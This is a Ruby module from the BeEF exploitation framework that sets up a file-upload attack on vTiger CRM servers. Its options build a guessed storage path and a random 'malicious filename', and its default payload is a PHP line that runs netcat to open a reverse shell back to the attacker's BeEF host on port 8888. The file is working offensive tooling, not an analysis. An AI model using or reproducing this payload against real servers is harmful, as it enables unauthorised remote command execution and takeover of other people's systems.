beef/modules/network/vtiger_crm_upload_exploit/module.rb

#
#   Copyright 2011 Wade Alcorn wade@bindshell.net
#
#   Licensed under the Apache License, Version 2.0 (the "License");
#   you may not use this file except in compliance with the License.
#   You may obtain a copy of the License at
#
#       http://www.apache.org/licenses/LICENSE-2.0
#
#   Unless required by applicable law or agreed to in writing, software
#   distributed under the License is distributed on an "AS IS" BASIS,
#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#   See the License for the specific language governing permissions and
#   limitations under the License.
#
class Vtiger_crm_upload_exploit < BeEF::Core::Command
  
  def self.options
    time = Time.new
    weekno = case time.day
        when 1..7 then 1
        when 8..14 then 2
        when 15..21 then 3
        when 22..28 then 4
        else 5
    end

    @configuration = BeEF::Core::Configuration.instance
    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
    return [
          {'name'=>'vtiger_url', 'ui_label' =>'Target Web Server','value'=>'http://vulnerable-vtiger.site','width'=>'400px'},
          {'name'=>'vtiger_filepath','ui_label'=>'Target Directory','value'=>'/storage/'+time.year.to_s()+'/'+time.strftime("%B")+'/week'+weekno.to_s()+'/','width'=>'400px'},
          {'name'=>'mal_filename','ui_label'=>'Malicious Filename','value'=>rand(32**10).to_s(32),'width'=>'400px'},
          {'name'=>'mal_ext','ui_label'=>'Malicious File Extension','value'=>'PHP','width'=>'400px'},
          {'name'=>'vtiger_php','ui_label'=>'Injected PHP (must escape single quotes)','value'=>'<?php passthru("/bin/nc -e /bin/sh '+beef_host+' 8888"); ?>','type'=>'textarea','width'=>'400px','height'=>'100px'},
          {'name'=>'upload_timeout','ui_label'=>'Upload Timeout','value'=>'5000'}
    ]
  end
  
  def post_execute
    return if @datastore['result'].nil?
    
    save({'result' => @datastore['result']})
  end
  
end